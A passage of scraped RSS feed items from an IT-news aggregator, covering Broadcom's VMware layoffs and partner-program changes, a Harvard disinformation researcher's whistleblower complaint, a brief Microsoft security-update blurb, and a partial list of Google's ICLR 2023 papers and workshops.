<p>Layoffs aren't a surprise, as Broadcom wasn't quiet about plans to cut headcount. Broadcom management said in a mid-2022 town hall meeting that they wanted VMware to become "lean and flat." Broadcom hasn't said how many people will be affected, but so far, the cuts include <a href="https://www.networkworld.com/article/1250690/broadcom-to-lay-off-over-1200-vmware-employees-as-deal-closes.html">1,267 VMware employees referenced in a December filing with the California Employment Development Department</a>.</p>



<p>A former VMware employee who is among those let go spoke to me on the condition of anonymity and said it is mostly senior salespeople who have left or are leaving. The former staffer also expects that the corporate cultures of the two firms will clash.</p>



<p>One potential issue is Broadcom's stance on remote work: VMware allowed employees to work from home, but Broadcom is all about getting employees back to the office. Broadcom CEO Hock Tan reportedly said to VMware employees that only salespeople and employees who live more than 60 miles from a VMware office could work remotely. “Any other exception, you better learn how to walk on water, I’m serious,” Tan said, according to an <a href="https://www.sfgate.com/home/article/about-sfgate-15613713.php">article in SFGATE.com</a> that cites the <a href="https://www.bizjournals.com/sanjose/news/2023/11/29/broadcom-takes-over-vmware-palo-alto-offices.html">Silicon Valley Business Journal</a>.</p>



<p>Steve Tuck, CEO of cloud systems vendor Oxide Computing, didn't believe the quote at first. "That’s not something you would say if your objective is to kind of quell fears," Tuck said. "But that is what he said, and [it's] really pretty surprising."</p>



<h2 class="wp-block-heading">Expect VMware layoffs, product cuts</h2>



<p>Steven Elliot, group vice president of infrastructure software at IDC, says the layoffs and consolidation are a good and necessary thing. He notes that Broadcom is not only cutting staff but also cutting products to focus on core competency.</p>



<p>"As companies grow larger and larger, they create a lot of complexity internally, across different business functions. What Hock brings to the table is not only a lot of experience and understanding of how to drive efficient operations, but also a lot of clarity with regards to the financial objectives and what customers should expect down the road. There’s a level of simplification and focus," Elliot said.</p>



<h2 class="wp-block-heading">Changes to partner programs and licensing models</h2>



<p>Broadcom is transitioning VMware's licensing model from perpetual software licenses to annual subscriptions, although this process began about a year before the acquisition. It ended VMware's partner program and is moving customers to an invite-only Broadcom Advantage Partner Program, effective February 5, 2024. All VMware partner incentive programs will end on or before February 4, 2024, according to a letter sent to partners and posted on a <a href="https://www.reddit.com/r/vmware/comments/18oql6w/vmware_partner_programs_no_more/">Reddit board</a> for VMware users.</p>



<p>A Broadcom spokesperson issued the following statement: "Broadcom remains committed to creating value within our combined ecosystem, which has been made stronger with the addition of VMware partners. Effective February 5, 2024, Broadcom will be transitioning VMware's partner programs to the invitation-only Broadcom Advantage Partner Program. Based on recent discussions with hundreds of partners globally, this transition will help our partners achieve even greater opportunities for profitability through simplified bundled offerings and more opportunities for service revenues."</p>



<h2 class="wp-block-heading">Will customer defections come to fruition?</h2>



<p>Before the deal even closed, Forrester Research estimated that up to 20% of VMware’s enterprise customers were planning to at least look into switching to a new virtual machine stack in the coming year.</p>



<p>While the confusion around VMware has been good for Oxide's business, Tuck said most VMware customers are under long-term contracts and likely couldn't get out of them too soon. He added: "I think every VMware customer is evaluating what’s the right strategy. And I think their findings of what the alternatives are, what the path to those alternatives are, are going to result in what percentage of those customers end up actually moving. But I think that feels like a conservative estimate," he said.</p>



<p>IDC's Elliott, meanwhile, said the opposite is happening. "There are customers that have actually already renewed [contracts]. They renewed after the deal was announced. And they’re renewing their license agreements after it has closed. So there are a lot of customers that are moving forward," Elliott said. </p>



<p>Tuck said VMware has raised prices a lot over the years, while the innovation that VMware has delivered has plateaued. "There’s a lot of latent frustration out there with VMware," he said.</p>



<p>Tuck declined to predict what would happen in the future as a result of senior talent defections and talent rebuilding efforts within the company, but he said all these actions are part of the Silicon Valley lifecycle. "This is the kind of forest fire that is productive and necessary for the healthy forest of innovation in Silicon Valley."</p>
</div></div></div><category>Data Center, Industry, Virtualization</category>]]></content:encoded>
</item>
<item>
<title><![CDATA[Harvard Accused of Bowing to Meta By Ousted Disinformation Scholar in Whistleblower Complaint]]></title>
<description><![CDATA[The Washington Post reports:
A prominent disinformation scholar has accused Harvard University of dismissing her to curry favor with Facebook and its current and former executives in violation of her right to free speech. 
 Joan Donovan claimed in a filing with the Education Department and the Ma...]]></description>
<link>https://tsecurity.de/de/1955841/it-security-nachrichten/harvard-accused-of-bowing-to-meta-by-ousted-disinformation-scholar-in-whistleblower-complaint/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1955841/it-security-nachrichten/harvard-accused-of-bowing-to-meta-by-ousted-disinformation-scholar-in-whistleblower-complaint/</guid>
<pubDate>Sun, 10 Dec 2023 02:35:23 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Washington Post reports:
A prominent disinformation scholar has accused Harvard University of dismissing her to curry favor with Facebook and its current and former executives in violation of her right to free speech. 
 Joan Donovan claimed in a filing with the Education Department and the Massachusetts attorney general that her superiors soured on her as Harvard was getting a record $500 million pledge from Meta founder Mark Zuckerberg's charitable arm. As research director of Harvard Kennedy School projects delving into mis- and disinformation on social media platforms, Donovan had raised millions in grants, testified before Congress and been a frequent commentator on television, often faulting internet companies for profiting from the spread of divisive falsehoods. Last year, the school's dean told her that he was winding down her main project and that she should stop fundraising for it. This year, the school eliminated her position. 

As one of the first researchers with access to "the Facebook papers" leaked by Frances Haugen, Donovan was asked to speak at a meeting of the Dean's Council, a group of the university's high-profile donors, remembers The Columbia Journalism Review :

Elliot Schrage, then the vice president of communications and global policy for Meta, was also at the meeting. Donovan says that, after she brought up the Haugen leaks, Schrage became agitated and visibly angry, "rocking in his chair and waving his arms and trying to interrupt." During a Q&amp;A session after her talk, Donovan says, Schrage reiterated a number of common Meta talking points, including the fact that disinformation is a fluid concept with no agreed-upon definition and that the company didn't want to be an "arbiter of truth." 

According to Donovan, Nancy Gibbs, Donovan's faculty advisor, was supportive after the incident. She says that they discussed how Schrage would likely try to pressure Elmendorf about the idea of creating a public archive of the documents... After Elmendorf called her in for a status meeting, Donovan claims that he told her she was not to raise any more money for her project; that she was forbidden to spend the money that she had raised (a total of twelve million dollars, she says); and that she couldn't hire any new staff. According to Donovan, Elmendorf told her that he wasn't going to allow any expenditure that increased her public profile, and used a number of Meta talking points in his assessment of her work... 

Donovan says she tried to move her work to the Berkman Klein Center at Harvard, but that the head of that center told her that they didn't have the "political capital" to bring on someone whom Elmendorf had "targeted"... Donovan told me that she believes the pressure to shut down her project is part of a broader pattern of influence in which Meta and other tech platforms have tried to make research into disinformation as difficult as possible... Donovan said she hopes that by blowing the whistle on Harvard, her case will be the "tip of the spear." 
Another interesting detail from the article:
[Donovan] alleges that Meta pressured Elmendorf to act, noting that he is friends with Sheryl Sandberg, the company's chief operating officer. (Elmendorf was Sandberg's advisor when she studied at Harvard in the early nineties; he attended Sandberg's wedding in 2022, four days before moving to shut down Donovan's project.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Harvard+Accused+of+Bowing+to+Meta+By+Ousted+Disinformation+Scholar+in+Whistleblower+Complaint%3A+https%3A%2F%2Fnews.slashdot.org%2Fstory%2F23%2F12%2F10%2F0035234%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fnews.slashdot.org%2Fstory%2F23%2F12%2F10%2F0035234%2Fharvard-accused-of-bowing-to-meta-by-ousted-disinformation-scholar-in-whistleblower-complaint%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://news.slashdot.org/story/23/12/10/0035234/harvard-accused-of-bowing-to-meta-by-ousted-disinformation-scholar-in-whistleblower-complaint?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Broadcom to lay off over 1,200 VMware employees as deal closes]]></title>
<description><![CDATA[Broadcom will lay off 1,267 VMware employees in January, the company said in a filing with the California Employment Development Department this week, made days after the $69 billion acquisition of VMware became final.



The first layoffs will come late in the month,  and will affect workers at ...]]></description>
<link>https://tsecurity.de/de/1947868/it-security-nachrichten/broadcom-to-lay-off-over-1200-vmware-employees-as-deal-closes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1947868/it-security-nachrichten/broadcom-to-lay-off-over-1200-vmware-employees-as-deal-closes/</guid>
<pubDate>Fri, 01 Dec 2023 23:35:03 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Broadcom will lay off 1,267 VMware employees in January, the company said in a filing with the California Employment Development Department this week, made days after the $69 billion acquisition of VMware became final.</p>



<p>The first layoffs will come late in the month,  and will affect workers at VMware's Palo Alto offices. Multiple reports detailed that the layoffs had long been feared among VMware workers, and that they were reflective of continued struggles at the pioneering virtualization company.</p>



<p>It's also standard practice for Broadcom to cut staff in the wake of acquisitions, as the company notably did after buying up CA Technologies, axing roughly 40% of that firm's workers after completing an $18.9 billion takeover in 2018. A report from Bloomberg said that VMware had over 38,000 employees before the deal with Broadcom closed. The San Francisco Chronicle, which first reported the layoffs, said that an additional roughly 800 jobs are slated to be on the chopping block after the first round.</p>



<p>"This will not result in closure of the entire facility [in Palo Alto], but will only impact certain employees selected for layoff. This planned action is expected to be permanent," wrote Broadcom's vice president of human resources, Jill Turner, in a notice filed with the CEDD. "Affected employees do not have a right to displace or bump any other employee, and they will not be recalled to work."</p>



<p>Stephen Elliot, a group vice president at IDC, said that the layoffs are likely to be popular with VMware customers and partners, who may appreciate the sense of renewed focus at the company.</p>



<p>"Sometimes as companies grow, they fund things that at the time might have been a pretty good idea, but as they mature, sometimes different priorities should be more of a focus," he said. "That's what Broadcom's bringing to the table."</p>



<p>Elliot harkened back to the CA deal in 2018 for an example of how Broadcom's belt-tightening - which had long been a part of its plans for VMware in its public messaging about the deal - had actually improved the business units that it absorbed.</p>



<p>"As a point of comparison, Broadcom's mainframe business has done better there than it did at CA," he said. "As a customer or partner ... there's going to be a lot of people that step back and say 'I like the focus.'"</p>



<p>Broadcom could not be reached for comment.</p>
</div></div></div><category>Mergers and Acquisitions, Technology Industry</category>]]></content:encoded>
</item>
<item>
<title><![CDATA[The April 2014 Security Updates]]></title>
<description><![CDATA[T. S. Elliot once said, “What we call the beginning is often the end. And to make an end is to make a beginning. The end is where we start from.” So as we put one season to bed, let’s start another by looking at the April security updates. Today, we release four bulletins to address 11 CVEs in Mi...]]></description>
<link>https://tsecurity.de/de/1895507/it-security-nachrichten/the-april-2014-security-updates/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1895507/it-security-nachrichten/the-april-2014-security-updates/</guid>
<pubDate>Fri, 20 Oct 2023 19:25:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[T. S. Elliot once said, “What we call the beginning is often the end. And to make an end is to make a beginning. The end is where we start from.” So as we put one season to bed, let’s start another by looking at the April security updates. Today, we release four bulletins to address 11 CVEs in Microsoft Windows, Internet Explorer and Microsoft Office.]]></content:encoded>
</item>
<item>
<title><![CDATA[Google at ICLR 2023]]></title>
<description><![CDATA[Posted by Catherine Armato, Program Manager, Google


The Eleventh International Conference on Learning Representations (ICLR 2023) is being held this week as a hybrid event in Kigali, Rwanda. We are proud to be a Diamond Sponsor of ICLR 2023, a premier conference on deep learning, where Google r...]]></description>
<link>https://tsecurity.de/de/1888495/ai-nachrichten/google-at-iclr-2023/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1888495/ai-nachrichten/google-at-iclr-2023/</guid>
<pubDate>Wed, 24 May 2023 10:16:58 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<span class="byline-author">Posted by Catherine Armato, Program Manager, Google</span>

<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaXU0Qnf7lWC70SIqFUj3KcinepmKmqVwu369RYcajoFZI0UGtej6ZGJD7c0GsXJk_Wjg08CnBLtE7lLlz__azqzUNCgflaTp3F9mZyIxX7HBzJEdTN19WMlfVsu4mTww-LLhvZ4hhWqdVCQqjQbrOk6VumBCH6dA2YwdATT6I_QLKLHSUz_Upnw6zlg/s1200/Google%20Rwanda%20Logo-02.jpg"><p>
The <a href="https://iclr.cc/Conferences/2023">Eleventh International Conference on Learning Representations</a> (ICLR 2023) is being held this week as a hybrid event in Kigali, Rwanda. We are proud to be a <a href="https://iclr.cc/Conferences/2023/Sponsors">Diamond Sponsor</a> of ICLR 2023, a premier conference on deep learning, where Google researchers contribute at all levels. This year we are presenting over 100 papers and are actively involved in organizing and hosting a number of different events, including workshops and interactive sessions.
</p>
<a name="more"></a> 
<p>
If you’re registered for ICLR 2023, we hope you’ll visit the Google booth to learn more about the exciting work we’re doing across topics spanning representation and reinforcement learning, theory and optimization, social impact, safety and privacy, and applications from generative AI to speech and robotics. Continue below to find the many ways in which Google researchers are engaged at ICLR 2023, including workshops, papers, posters and talks (Google affiliations in <strong>bold</strong>).
</p>
<br><h2>Board and Organizing Committee</h2>


<p>
Board Members include: <strong><em>Tara Sainath</em></strong>
</p>
<p>
Senior Program Chairs include: <strong><em>Been Kim</em></strong>
</p>
<p>
Workshop Chairs include: <strong><em>Aisha Walcott-Bryant</em></strong>, <strong><em>Rose Yu</em></strong>
</p>
<p>
Diversity, Equity &amp; Inclusion Chairs include: <strong><em>Rosanne Liu</em></strong>
</p>
<div>
    <br></div>
<h2>Outstanding Paper awards</h2>


<p>
<a href="https://openreview.net/pdf?id=lTt4KjHSsyl">Emergence of Maps in the Memories of Blind Navigation Agents</a>
<br><em>Erik Wijmans</em>, <em>Manolis Savva</em>, <strong><em>Irfan Essa</em></strong>, <em>Stefan Lee</em>, <em>Ari S. Morcos</em>, <em>Dhruv Batra</em>
</p>
<p>
<a href="https://openreview.net/pdf?id=FjNys5c7VyY">DreamFusion: Text-to-3D Using 2D Diffusion</a>
<br><strong><em>Ben Poole</em></strong>, <em>Ajay Jain</em>, <strong><em>Jonathan T. Barron</em></strong>, <strong><em>Ben Mildenhall</em></strong>
</p>
<div>
    <br></div>
<h2>Keynote speaker</h2>


<p>
<a href="https://iclr.cc/virtual/2023/invited-talk/14236">Learned Optimizers: Why They're the Future, Why They’re Hard, and What They Can Do Now</a>
<br><b><i>
Jascha Sohl-Dickstein
</i></b></p>

<div>
    <br></div>
<h2>Workshops</h2>


<p>
<a href="https://www.kaggle.com/iclr-2023">Kaggle@ICLR 2023: ML Solutions in Africa</a>
<br>
Organizers include: <b><i>Julia Elliott</i></b>, <b><i>Phil Culliton</i></b>, <b><i>Ray Harvey
</i></b><br>
Facilitators: <b><i>Julia Elliot</i></b>, <b><i>Walter Reade
</i></b></p>
<p>
<a href="https://reincarnating-rl.github.io/">Reincarnating Reinforcement Learning</a> (Reincarnating RL)
<br>
Organizers include: <b><i>Rishabh Agarwal</i></b>, <b><i>Ted Xiao</i></b>, <b><i>Max Schwarzer
</i></b><br>
Speakers include: <b><i>Sergey Levine
</i></b><br>
Panelists include: <b><i>Marc G. Bellemare</i></b>, <b><i>Sergey Levine
</i></b></p>
<p>
<a href="https://rtml-iclr2023.github.io/organizers.html">Trustworthy and Reliable Large-Scale Machine Learning Models</a>
<br>
Organizers include: <b><i>Sanmi Koyejo
</i></b><br>
Speakers include: <b><i>Nicholas Carlini
</i></b></p>
<p>
<a href="https://physics4ml.github.io/organizers">Physics for Machine Learning</a> (Physics4ML)
<br>
Speakers include: <b><i>Yasaman Bahri
</i></b></p>
<p>
<a href="https://ai4abm.org/workshop_iclr2023/">AI for Agent-Based Modelling Community</a> (AI4ABM)
<br>
Organizers include: <b><i>Pablo Samuel Castro
</i></b></p>
<p>
<a href="https://sites.google.com/corp/view/me-fomo2023">Mathematical and Empirical Understanding of Foundation Models</a> (ME-FoMo)
<br>
Organizers include: <b><i>Mathilde Caron</i></b>, <b><i>Tengyu Ma</i></b>, <b><i>Hanie Sedghi
</i></b><br>
Speakers include: <b><i>Yasaman Bahri</i></b>, <b><i>Yann Dauphin
</i></b></p>
<p>
<a href="https://nesygems.github.io/">Neurosymbolic Generative Models 2023</a> (NeSy-GeMs)
<br>
Organizers include: <b><i>Kevin Ellis
</i></b><br>
Speakers include: <b><i>Daniel Tarlow</i></b>, <b><i>Tuan Anh Le
</i></b></p>
<p>
<a href="https://domaingen.github.io/">What Do We Need for Successful Domain Generalization?</a>
<br>
Panelists include: <b><i>Boqing Gong
</i></b></p>
<p>
<a href="https://pml4dc.github.io/iclr2023/">The 4th Workshop on Practical ML for Developing Countries: Learning Under Limited/Low Resource Settings</a>
<br>
Keynote Speaker: <b><i>Adji Bousso Dieng
</i></b></p>
<p>
<a href="https://nasaharvest.github.io/ml-for-remote-sensing/iclr2023/#schedule">Machine Learning for Remote Sensing</a>
<br>
Speakers include: <b><i>Abigail Annkah
</i></b></p>
<p>
<a href="https://mrl-workshop.github.io/iclr-2023/">Multimodal Representation Learning (MRL): Perks and Pitfalls</a>
<br>
Organizers include: <b><i>Petra Poklukar
</i></b><br>
Speakers include: <b><i>Arsha Nagrani
</i></b></p>
<p>
<a href="https://sites.google.com/corp/view/trustml-unlimited/home">Pitfalls of Limited Data and Computation for Trustworthy ML</a>
<br>
Organizers include: <b><i>Prateek Jain
</i></b><br>
Speakers include: <b><i>Nicholas Carlini</i></b>, <b><i>Praneeth Netrapalli
</i></b></p>
<p>
<a href="https://sites.google.com/corp/view/trustml-unlimited/home">Sparsity in Neural Networks: On Practical Limitations and Tradeoffs Between Sustainability and Efficiency</a>
<br>
Organizers include: <b><i>Trevor Gale</i></b>, <b><i>Utku Evci
</i></b><br>
Speakers include: <b><i>Aakanksha Chowdhery</i></b>, <b><i>Jeff Dean
</i></b></p>
<p>
<a href="https://sites.google.com/corp/view/tsrl4h-iclr2023/home">Time Series Representation Learning for Health</a>
<br>
Speakers include: <b><i>Katherine Heller
</i></b></p>
<p>
<a href="https://dl4c.github.io/">Deep Learning for Code</a> (DL4C)
<br>
Organizers include: <b><i>Gabriel Orlanski
</i></b><br>
Speakers include: <b><i>Alex Polozov</i></b>, <b><i>Daniel Tarlow
</i></b></p>
<p>
<a href="https://mlgh-2023.netlify.app/">Machine Learning and Global Health</a>
<br>
Organizers include: <b><i>Mercy Asiedu
</i></b><br>
Speakers include: <b><i>Joelle Barral</i></b></p>

<div>
    <br></div>
<h2>Affinity Workshops</h2>


<p>
<a href="https://iclr.cc/virtual/2023/affinity-workshop/13838">Tiny Papers Showcase Day</a> (a DEI initiative)
<br>
Organizers include: <b><i>Rosanne Liu
</i></b></p>

<div>
    <br></div>
<h2>Papers</h2>


<p>
<a href="https://openreview.net/pdf?id=Z4s7sJYQM">Evolve Smoothly, Fit Consistently: Learning Smooth Latent Dynamics for Advection-Dominated Systems</a>
<br><b><i>
Zhong Yi Wan</i></b>, <b><i>Leonardo Zepeda-Nunez</i></b>, <b><i>Anudhyan Boral</i></b>, <b><i>Fei Sha
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=TatRHT_1cK">Quantifying Memorization Across Neural Language Models</a>
<br><b><i>
Nicholas Carlini</i></b>, <b><i>Daphne Ippolito</i></b>, <b><i>Matthew Jagielski</i></b>, <b><i>Katherine Lee</i></b>, <b><i>Florian Tramer</i></b>, <b><i>Chiyuan Zhang
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=lTt4KjHSsyl">Emergence of Maps in the Memories of Blind Navigation Agents</a> (<em>Outstanding Paper Award</em>)
<br><i>
Erik Wijmans</i>, <i>Manolis Savva</i>, <b><i>Irfan Essa</i></b>, <i>Stefan Lee</i>, <i>Ari S. Morcos</i>, <i>Dhruv Batra
</i></p>
<p>
<a href="https://openreview.net/pdf?id=4-k7kUavAj">Offline Q-Learning on Diverse Multi-task Data Both Scales and Generalizes</a> (see <a href="https://ai.googleblog.com/2023/02/pre-training-generalist-agents-using.html">blog post</a>)<br><b><i>
Aviral Kumar</i></b>, <b><i>Rishabh Agarwal</i></b>, <i>Xingyang Geng</i>, <b><i>George Tucker</i></b>, <b><i>Sergey Levine
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=WE_vluYUL-X">ReAct: Synergizing Reasoning and Acting in Language Models</a> (see <a href="https://ai.googleblog.com/2022/11/react-synergizing-reasoning-and-acting.html">blog post</a>)<br><i>
Shunyu Yao</i>*, <b><i>Jeffrey Zhao</i></b>, <b><i>Dian Yu</i></b>, <b><i>Nan Du</i></b>, <b><i>Izhak Shafran</i></b>, <i>Karthik R. Narasimhan</i>, <b><i>Yuan Cao
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=_CDixzkzeyb">Prompt-to-Prompt Image Editing with Cross-Attention Control</a>
<br><b><i>
Amir Hertz</i></b>, <b><i>Ron Mokady</i></b>, <b><i>Jay Tenenbaum</i></b>, <b><i>Kfir Aberman</i></b>, <b><i>Yael Pritch</i></b>, <b><i>Daniel Cohen-Or
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=FjNys5c7VyY">DreamFusion: Text-to-3D Using 2D Diffusion</a> (<em>Outstanding Paper Award</em>)
<br><i><b>
Ben Poole</b></i>, <i>Ajay Jain</i>, <b><i>Jonathan T. Barron</i></b>, <b><i>Ben Mildenhall
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=HcUf-QwZeFh">A System for Morphology-Task Generalization via Unified Representation and Behavior Distillation</a>
<br><b><i>
Hiroki Furuta</i></b>, <i>Yusuke Iwasawa</i>, <i>Yutaka Matsuo</i>, <b><i>Shixiang Shane Gu
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=OpC-9aBBVJe">Sample-Efficient Reinforcement Learning by Breaking the Replay Ratio Barrier</a>
<br><i>
Pierluca D'Oro</i>, <b><i>Max Schwarzer</i></b>, <i>Evgenii Nikishin</i>, <i>Pierre-Luc Bacon</i>, <b><i>Marc G Bellemare</i></b>, <i>Aaron Courville
</i></p>
<p>
<a href="https://openreview.net/pdf?id=DEGjDDV22pI">Dichotomy of Control: Separating What You Can Control from What You Cannot</a>
<br><b><i>
Sherry Yang</i></b>, <b><i>Dale Schuurmans</i></b>, <i>Pieter Abbeel</i>, <b><i>Ofir Nachum
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=7JsGYvjE88d">Fast and Precise: Adjusting Planning Horizon with Adaptive Subgoal Search</a>
<br><i>
Michał Zawalski</i>, <i>Michał Tyrolski</i>, <i>Konrad Czechowski</i>, <i>Tomasz Odrzygóźdź</i>, <i>Damian Stachura</i>, <i>Piotr Piekos</i>, <b><i>Yuhuai Wu</i></b>, <i>Łukasz Kucinski</i>, <i>Piotr Miłos
</i></p>
<p>
<a href="https://openreview.net/pdf?id=rvsbw2YthH_">The Trade-Off Between Universality and Label Efficiency of Representations from Contrastive Learning</a>
<br><i>
Zhenmei Shi</i>, <i>Jiefeng Chen</i>, <i>Kunyang Li</i>, <i>Jayaram Raghuram</i>, <b><i>Xi Wu</i></b>, <i>Yingyu Liang</i>, <i>Somesh Jha
</i></p>
<p>
<a href="https://openreview.net/pdf?id=yHY9NbQJ5BP">Sparsity-Constrained Optimal Transport</a>
<br><i>
Tianlin Liu</i>*, <b><i>Joan Puigcerver</i></b>, <b><i>Mathieu Blondel
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=xSsW2Am-ukZ">Unmasking the Lottery Ticket Hypothesis: What's Encoded in a Winning Ticket's Mask?</a>
<br><i>
Mansheej Paul</i>, <i>Feng Chen</i>, <i>Brett W. Larsen</i>, <i>Jonathan Frankle</i>, <i>Surya Ganguli</i>, <b><i>Gintare Karolina Dziugaite
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=SJ0Lde3tRL">Extreme Q-Learning: MaxEnt RL without Entropy</a>
<br><i>
Divyansh Garg</i>, <i>Joey Hejna</i>, <b><i>Matthieu Geist,</i></b> <i>Stefano Ermon
</i></p>
<p>
<a href="https://openreview.net/pdf?id=SMa9EAovKMC">Draft, Sketch, and Prove: Guiding Formal Theorem Provers with Informal Proofs</a>
<br><i>
Albert Qiaochu Jiang</i>, <i>Sean Welleck</i>, <b><i>Jin Peng Zhou</i></b>, <i>Timothee Lacroix</i>, <i>Jiacheng Liu</i>, <i>Wenda Li</i>, <i>Mateja Jamnik</i>, <i>Guillaume Lample</i>, <b><i>Yuhuai Wu
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=EKpMeEV0hOo">SimPer: Simple Self-Supervised Learning of Periodic Targets</a>
<br><i>
Yuzhe Yang</i>, <i>Xin Liu</i>, <i><b>Jiang Wu</b></i>, <i><b>Silviu Borac</b></i>, <i>Dina Katabi</i>, <b><i>Ming-Zher Poh</i></b>, <b><i>Daniel McDuff
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=G2Q2Mh3avow">Socratic Models: Composing Zero-Shot Multimodal Reasoning with Language</a>
<br><b><i>
Andy Zeng</i></b>, <b><i>Maria Attarian</i></b>, <b><i>Brian Ichter</i></b>, <b><i>Krzysztof Marcin Choromanski</i></b>, <b><i>Adrian Wong</i></b>, <b><i>Stefan Welker</i></b>, <b><i>Federico Tombari</i></b>, <b><i>Aveek Purohit</i></b>, <b><i>Michael S. Ryoo</i></b>, <b><i>Vikas Sindhwani</i></b>, <b><i>Johnny Lee</i></b>, <b><i>Vincent Vanhoucke</i></b>, <b><i>Pete Florence
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=0g0X4H8yN4I">What Learning Algorithm Is In-Context Learning? Investigations with Linear Models</a>
<br><i>
Ekin Akyurek</i>*, <b><i>Dale Schuurmans</i></b>, <i>Jacob Andreas</i>, <i>Tengyu Ma</i>*, <b><i>Denny Zhou
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=Peot1SFDX0">Preference Transformer: Modeling Human Preferences Using Transformers for RL</a>
<br><i>
Changyeon Kim</i>, <i>Jongjin Park</i>, <i>Jinwoo Shin</i>, <i>Honglak Lee</i>, <i>Pieter Abbeel</i>, <b><i>Kimin Lee
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=QCrw0u9LQ7">Iterative Patch Selection for High-Resolution Image Recognition</a>
<br><i>
Benjamin Bergner</i>, <i>Christoph Lippert</i>, <b><i>Aravindh Mahendran
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=MIMwy4kh9lf">Open-Vocabulary Object Detection upon Frozen Vision and Language Models</a> (see <a href="https://ai.googleblog.com/2023/05/f-vlm-open-vocabulary-object-detection.html">blog post</a>)<br><b><i>
Weicheng Kuo</i></b>, <b><i>Yin Cui</i></b>, <b><i>Xiuye Gu</i></b>, <b><i>AJ Piergiovanni</i></b>, <i><b>Anelia Angelova
</b></i></p>
<p>
<a href="https://openreview.net/pdf?id=JLg5aHHv7j">(Certified!!) Adversarial Robustness for Free!</a>
<br><b><i>
Nicholas Carlini</i></b>, <b><i>Florian Tramér</i></b>, <b><i>Krishnamurthy (Dj) Dvijotham</i></b>, <i>Leslie Rice</i>, <i>Mingjie Sun</i>, <i>J. Zico Kolter
</i></p>
<p>
<a href="https://openreview.net/pdf?id=gU5sJ6ZggcX">REPAIR: REnormalizing Permuted Activations for Interpolation Repair</a>
<br><i>
Keller Jordan</i>, <b><i>Hanie Sedghi</i></b>, <i>Olga Saukh</i>, <i>Rahim Entezari</i>, <b><i>Behnam Neyshabur
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=VM8batVBWvg">Discrete Predictor-Corrector Diffusion Models for Image Synthesis</a>
<br><b><i>
José Lezama</i></b>, <b><i>Tim Salimans</i></b>, <b><i>Lu Jiang</i></b>, <i><b>Huiwen Chang</b></i>, <b><i>Jonathan Ho</i></b>, <b><i>Irfan Essa
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=zH9GcZ3ZGXu">Feature Reconstruction From Outputs Can Mitigate Simplicity Bias in Neural Networks</a>
<br><b><i>
Sravanti Addepalli</i></b>, <b><i>Anshul Nasery</i></b>, <b><i>Praneeth Netrapalli</i></b>, <i>Venkatesh Babu R.</i>, <b><i>Prateek Jain
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=-CoNloheTs">An Exact Poly-time Membership-Queries Algorithm for Extracting a Three-Layer ReLU Network</a>
<br><b><i>
Amit Daniely</i></b>, <i>Elad Granot
</i></p>
<p>
<a href="https://openreview.net/pdf?id=fR3wGCk-IXp">Language Models Are Multilingual Chain-of-Thought Reasoners</a>
<br><b><i>
Freda Shi</i></b>, <b><i>Mirac Suzgun</i></b>, <b><i>Markus Freitag</i></b>, <b><i>Xuezhi Wang</i></b>, <i>Suraj Srivats</i>, <i>Soroush Vosoughi</i>, <b><i>Hyung Won Chung</i></b>, <b><i>Yi Tay</i></b>, <b><i>Sebastian Ruder</i></b>, <b><i>Denny Zhou</i></b>, <b><i>Dipanjan Das</i></b>, <b><i>Jason Wei
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=JxpBP1JM15-">Scaling Forward Gradient with Local Losses</a>
<br><i>
Mengye Ren</i>*, <b><i>Simon Kornblith</i></b>, <i>Renjie Liao</i>, <b><i>Geoffrey Hinton
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=DWn1TEb2fK">Treeformer: Dense Gradient Trees for Efficient Attention Computation</a>
<br><b><i>
Lovish Madaan</i></b>, <b><i>Srinadh Bhojanapalli</i></b>, <b><i>Himanshu Jain</i></b>, <b><i>Prateek Jain
</i></b></p>
<p>
<a href="https://openreview.net/pdf?id=NVZvalzCLg">LilNetX: Lightweight Networks with EXtreme Model Compression and Structured Sparsification</a>
